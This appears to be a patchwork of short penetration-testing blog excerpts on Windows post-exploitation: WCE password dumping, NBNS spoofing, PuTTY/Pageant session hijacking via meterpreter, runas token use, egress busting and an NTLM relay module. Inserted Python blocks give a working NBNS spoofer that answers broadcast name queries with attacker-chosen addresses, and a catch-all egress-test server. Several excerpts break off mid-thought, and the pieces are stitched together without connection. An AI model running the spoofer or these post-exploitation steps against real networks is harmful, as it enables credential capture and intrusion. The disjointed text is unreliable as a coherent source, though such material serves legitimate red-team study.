Executing WCE.exe in memory, as demoed by Egypt here: https://community.rapid7.com/community/metasploit/blog/2012/05/08/eternal-sunshine-of-the-spotless-ram has two issues with it.

1. You leave a file on disk with your hashes and clear-text passwords. That just won't do.
2. There is a DLL called WCEAUX.dll that gets written to disk for the briefest second: (yes, I realize I'm running 'wce32.exe' from disk here, but it exhibits the same DLL drop when run in memory)

Now, don't get me wrong, I love WCE, and Hernan Ochoa does an amazing job with it, but when it comes down to it, it's not the best tool for this particular job.
So it turns out that Windows Firewall talks IP addresses just like any other firewall, so if you configure FakeNetBIOSNS to tell everyone that the IP address for whatever they looked up is YOUR IP, guess what: no need to bypass the spoof filters ;-) Happy Rob!

    $ cat nbns.ini
    PROJECTMENTOR WPAD 172.16.10.207
    PROJECTMENTOR FILESHARE 184.108.40.206

Results in: Game ON!
One of pen testers' favorite attacks is NBNS spoofing. Now Wesley, who I originally learned this attack from, traced this back to sid (http://www.notsosecure.com/folder2/2007/03/14/abusing-tcpip-name-resolution-in-windows-to-carry-out-phishing-attacks/). Wesley's stuff can be found here: http://www.mcgrewsecurity.com/tools/nbnspoof/ Wesley's stuff eventually led to this awesome post on the Packetstan blog: http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html and in that post the Metasploit module to do it all is demoed. But therein lies the rub. With each degree of separation we have more and more solidified it into an "on-site only" attack.
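What the NBNS spoofers above (nbnspoof, the Metasploit module, FakeNetBIOSNS with the nbns.ini from the previous post) actually put on the wire is small: a NetBIOS name query arrives as a UDP/137 broadcast, and the spoofer sends back a positive name query response that maps the requested name to an address of its choosing. The following is an added Python example, not code from any of those tools or from the post; it follows the RFC 1002 wire format, builds its answer table from an nbns.ini-style text modelled on the one shown above (treating the first column as a domain filter is an assumption; only the name and IP columns are used here), and when run as a script listens on 0.0.0.0:137 (root required) and answers matching queries.

```python
"""NBNS (RFC 1002) name query parsing and spoofed positive-answer construction.
Added example for illustration; not code from room362.com, FakeNetBIOSNS,
nbnspoof or Metasploit."""
import socket
import struct

# Constructed to mirror the post's nbns.ini: "<match-name> <requested-name> <answer-ip>".
# The first column being a filter on the requester's domain is an assumption.
NBNS_INI = """\
PROJECTMENTOR WPAD 172.16.10.207
PROJECTMENTOR FILESHARE 184.108.40.206
"""

NB_TYPE = 0x0020      # NB resource record type
IN_CLASS = 0x0001


def load_ini(text):
    """Map requested NetBIOS name -> answer IP (second and third columns)."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            table[parts[1].upper()] = parts[2]
    return table


def encode_name(name, suffix=0x00):
    """First-level encoding: 15-char space-padded name plus a suffix byte, each
    nibble mapped to 'A'..'P', prefixed by the length 0x20 and terminated by 0x00."""
    raw = name.upper().ljust(15).encode("ascii")[:15] + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc.append(ord("A") + (b >> 4))
        enc.append(ord("A") + (b & 0x0F))
    return b"\x20" + bytes(enc) + b"\x00"


def decode_name(encoded):
    """Inverse of encode_name; returns (name, suffix)."""
    raw = bytes(((encoded[i] - ord("A")) << 4) | (encoded[i + 1] - ord("A"))
                for i in range(1, 33, 2))
    return raw[:15].decode("latin-1").rstrip(), raw[15]


def build_query(name, tid=0x1234):
    """Client side: broadcast name query (flags 0x0110, QDCOUNT=1)."""
    hdr = struct.pack(">HHHHHH", tid, 0x0110, 1, 0, 0, 0)
    return hdr + encode_name(name) + struct.pack(">HH", NB_TYPE, IN_CLASS)


def parse_query(pkt):
    """Return (tid, name, suffix) for a well-formed NB name query, else None."""
    if len(pkt) < 50:
        return None
    tid, flags, qd, _an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qd != 1:          # ignore responses and non-queries
        return None
    qname = pkt[12:46]
    if qname[0] != 0x20 or qname[33] != 0x00:
        return None
    if any(c < ord("A") or c > ord("P") for c in qname[1:33]):
        return None
    qtype, qclass = struct.unpack(">HH", pkt[46:50])
    if qtype != NB_TYPE or qclass != IN_CLASS:
        return None
    name, suffix = decode_name(qname)
    return tid, name, suffix


def build_response(tid, name, suffix, ip, ttl=165):
    """Positive name query response pointing NAME at IP. Flags 0x8500 = response,
    authoritative answer, recursion desired. RDATA is the 2-byte NB_FLAGS
    (0x0000 = B-node, unique name) followed by the IPv4 address."""
    hdr = struct.pack(">HHHHHH", tid, 0x8500, 0, 1, 0, 0)
    rr = encode_name(name, suffix) + struct.pack(">HHIH", NB_TYPE, IN_CLASS, ttl, 6)
    rdata = struct.pack(">H", 0x0000) + socket.inet_aton(ip)
    return hdr + rr + rdata


def answer_for(pkt, table):
    """Given one raw UDP/137 datagram, return the spoofed reply or None."""
    q = parse_query(pkt)
    if q is None:
        return None
    tid, name, suffix = q
    ip = table.get(name)
    if ip is None:
        return None
    return build_response(tid, name, suffix, ip)


if __name__ == "__main__":
    table = load_ini(NBNS_INI)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", 137))            # needs root; sees the broadcasts
    while True:
        data, src = sock.recvfrom(1024)
        reply = answer_for(data, table)
        if reply:
            sock.sendto(reply, src)
```

The transaction ID is copied from the query because the requester matches answers on it; the suffix byte (0x00 workstation, 0x20 file server, and so on) is echoed back for the same reason. The reason the attack is "on-site only" is visible in the first line of the main loop: the query is a link-local broadcast, so the spoofer has to be on the same broadcast domain to ever receive it.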
Watching Egypt's talk at DEFCON 20, he mentioned the ability to jump onto a system when Pageant (PuTTY's ssh-agent equivalent) is running. So I wanted to figure out the best way to get this going. Here is what I came up with:

    meterpreter > run enum_putty
    [*] Putty Installed for [["Administrator"]]
    [*] Saved SSH Server Public Keys:
    [*]     rsa2@22:172.16.10.150
    [*] Session corp_webserver:
    [*]     Protocol: SSH
    [*]     Hostname: 172.16.10.150
    [*]     Username: root
    [*]     Public Key:
    meterpreter >

Awesome, this guy runs as root and we have the IP address.
The post exploitation command lists:

Linux/Unix/BSD Post Exploitation: https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit
Windows Post Exploitation: https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit
OSX Post Exploitation: https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit
and the newly added Obscure System's Post Exploitation: https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit
and Metasploit Post Exploitation: https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit

have been a weekly upkeep for me with so many... I don't know what to call it, 'undesirable edits' to them. Bad copies, bad pastes, formatting issues and sometimes deletion or vandalism of the docs. Anyways, I have finally broken down and removed 'world' editable permissions.
In the previous post: http://www.room362.com/blog/2012/8/11/let-me-out-of-your-net-workndashintro.html I told you about letmeoutofyour.net, but how does it work? Things we need to accomplish on the server:

- Listen on all ports
- Answer for all hostnames and subdomains
- Answer for all HTTP verbs, file and folder requests

ONE: Listen on all ports (I used Linux, so this guide is for such; modifications for other OSs are up to the reader). First you have to get rid of all other services.
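The three server-side requirements above can be met with one catch-all HTTP responder plus a NAT rule. What follows is an added Python example written for this page, not letmeoutofyour.net's own code: every HTTP method, path and Host header gets the same fixed reply, so a client inside a network can tell from the body whether it truly reached the outside or was answered by a proxy or captive portal. The canary string and the X-Seen-* header names are assumptions. "Listen on all ports" is delegated to the iptables REDIRECT shown in the comment at the end rather than opening 65535 sockets, and "answer for all hostnames" is a wildcard DNS record (an A record for * under the domain) pointing at this host; the handler simply never looks at the name it was asked for.

```python
"""Catch-all egress-test HTTP responder in the spirit of letmeoutofyour.net.
Added example, not the site's own code. Replies to every method, path and
Host with one fixed body; the reply string and header names are assumed."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CANARY = b"w00tw00t\n"   # assumed fixed body; any string the client can look for works


def canary_response(method, path, host):
    """Pure function behind the handler so the logic is testable without sockets.
    Echoes what was seen so the client can spot a proxy rewriting the request."""
    headers = [
        ("Content-Type", "text/plain"),
        ("X-Seen-Method", method),
        ("X-Seen-Path", path),
        ("X-Seen-Host", host or ""),
        ("Content-Length", str(len(CANARY))),
    ]
    return 200, headers, CANARY


class CatchAllHandler(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.0"     # one request per connection, then close

    def _reply(self):
        status, headers, body = canary_response(
            self.command, self.path, self.headers.get("Host"))
        self.send_response(status)
        for k, v in headers:
            self.send_header(k, v)
        self.end_headers()
        self.wfile.write(body)

    def __getattr__(self, name):
        # BaseHTTPRequestHandler dispatches to do_<METHOD>; answer every verb,
        # including ones it has never heard of (PROPFIND, BREW, ...), the same way.
        if name.startswith("do_"):
            return self._reply
        raise AttributeError(name)

    def log_message(self, fmt, *args):
        pass                          # keep the demo quiet


def start_server(port):
    """Bind on all interfaces (port 0 = ephemeral), serve in a daemon thread and
    return the server so the caller can read server_address and shut it down."""
    srv = ThreadingHTTPServer(("0.0.0.0", port), CatchAllHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(host, port, method="POST", path="/any/path", vhost="anything.example"):
    """Client side: one request with an arbitrary verb/path/Host, return (status, body)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request(method, path, body=b"x", headers={"Host": vhost})
    resp = conn.getresponse()
    return resp.status, resp.read()


if __name__ == "__main__":
    # Listening on every TCP port: instead of 65535 listeners, redirect them all
    # to this one with a NAT rule (assumed deployment, run as root on the server):
    #   iptables -t nat -A PREROUTING -p tcp --dport 1:65535 -j REDIRECT --to-ports 8080
    srv = start_server(8080)
    print("catch-all responder on port 8080")
    threading.Event().wait()
```

Because the handler ignores the request line and Host entirely, a client can use any verb and path it likes, which is exactly what makes the body a usable known-good: if "w00tw00t" comes back, the request left the network unmolested; anything else was produced by something in between.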
Something that is often useful is a known-good: something out of the control of your adversary or other outside modifiers. But back to that in a sec. Egress 'busting', or getting your payload/backdoor/trojan/C2 out of someone's network once you've gotten that ever-elusive "CODE EXECUTION HAPPY DANCE" going on, isn't always easy. There is even a Metasploit payload for it called 'allports': https://community.rapid7.com/community/metasploit/blog/2009/09/24/forcing-payloads-through-restrictive-firewalls There is also 'Egress Buster' by the guys over at TrustedSec, which can do 1000 ports in just a few seconds:
Egypt and I have decided to give away a spot in our training event at DerbyCon. This won't come easy though: you have to submit an essay to us on one of the following topics.

Essay Topic Options:
1. Why I deserve a free training class
2. How I would social engineer Egypt and Mubix out of a ticket to their class

Maximum Length: ~1000 words / 3 pages. (We're lazy)
With the use of Mimikatz and WCE, clear-text passwords are much more common. What isn't always there is the user. They take lunches, go home at a reasonable time, and generally aren't appreciative of our (pentester/red teamer) schedule. A straightforward way, provided by Microsoft, to create a process as a user (thereby having their token readily available) is 'runas.exe': w00t, the user is present, so we can migrate our meterpreter session into that notepad and we're good, right?
Every so often someone writes a Metasploit module that is pretty epic. Today is one such day:

Twitter link: https://twitter.com/webstersprodigy/status/222529916783169536
Which has a link to here: https://github.com/rapid7/metasploit-framework/pull/589
Demo / example resource files: https://skydrive.live.com/?cid=19794fac33285fd5&resid=19794FAC33285FD5!170&id=19794FAC33285FD5%21170
You can pull the fork w/ branch from here: https://github.com/webstersprodigy/metasploit-framework/tree/module-http-ntlmrelay

And as soon as you do, you can start doing this (using the example resource file to put a file, cat it out, enumerate the available shares, list files on a share, then psexec, all from a single URL being loaded):